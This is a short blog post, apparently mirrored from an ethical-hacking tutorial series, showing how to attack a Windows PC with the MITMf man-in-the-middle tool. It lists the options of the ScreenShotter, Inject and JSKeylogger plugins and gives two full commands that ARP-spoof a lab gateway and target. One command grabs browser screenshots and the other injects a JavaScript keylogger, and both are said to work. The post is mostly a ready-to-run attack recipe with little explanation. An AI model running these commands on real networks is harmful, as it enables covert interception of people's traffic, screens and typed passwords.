zoukankan      html  css  js  c++  java
  • Ethical Hacking

    MITM - Capturing Screen Of Target & Injecting a Keylogger

    ScreenShotter Plugin:

    ScreenShotter:
      Uses HTML5 Canvas to render an accurate screenshot of a clients browser
    
      --screen              Load plugin 'ScreenShotter'
      --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

    Inject Plugin:

    Inject:
      Inject arbitrary content into HTML content
    
      --inject              Load plugin 'Inject'
      --js-url JS_URL       URL of the JS to inject
      --js-payload JS_PAYLOAD
                            JS string to inject
      --js-file JS_FILE     File containing JS to inject
      --html-url HTML_URL   URL of the HTML to inject
      --html-payload HTML_PAYLOAD
                            HTML string to inject
      --html-file HTML_FILE
                            File containing HTML to inject
      --per-domain          Inject once per domain per client.
      --rate-limit RATE_LIMIT
                            Inject once every RATE_LIMIT seconds per client.
      --count-limit COUNT_LIMIT
                            Inject only COUNT_LIMIT times per client.
      --white-ips IP        Inject content ONLY for these ips (comma seperated)
      --black-ips IP        DO NOT inject content for these ips (comma seperated)
      --white-domains DOMAINS
                            Inject content ONLY for these domains (comma seperated)
      --black-domains DOMAINS
                            DO NOT inject content for these domains (comma seperated)

    Test the ScreenShotter on Victim Windows PC.

    python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --screen

    It works perfectly.

     

     

    JSKeylogger Plugin:

    JSKeylogger:
      Injects a javascript keylogger into clients webpages
    
      --jskeylogger         Load plugin 'JSKeylogger'

    Usage:

    python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --jskeylogger

     It works...

     

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    第五周进度条
    《掌握需求过程》阅读笔记01
    第三周进度条
    问题账户需求分析
    2016年秋季阅读个人计划
    梦断代码阅读笔记03
    软件工程概论课程总结
    Python爬取上交所一年大盘数据
    Python爬取6271家死亡公司数据,看十年创业公司消亡史
    python:王思聪究竟上了多少次热搜?
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/12040866.html
Copyright © 2011-2022 走看看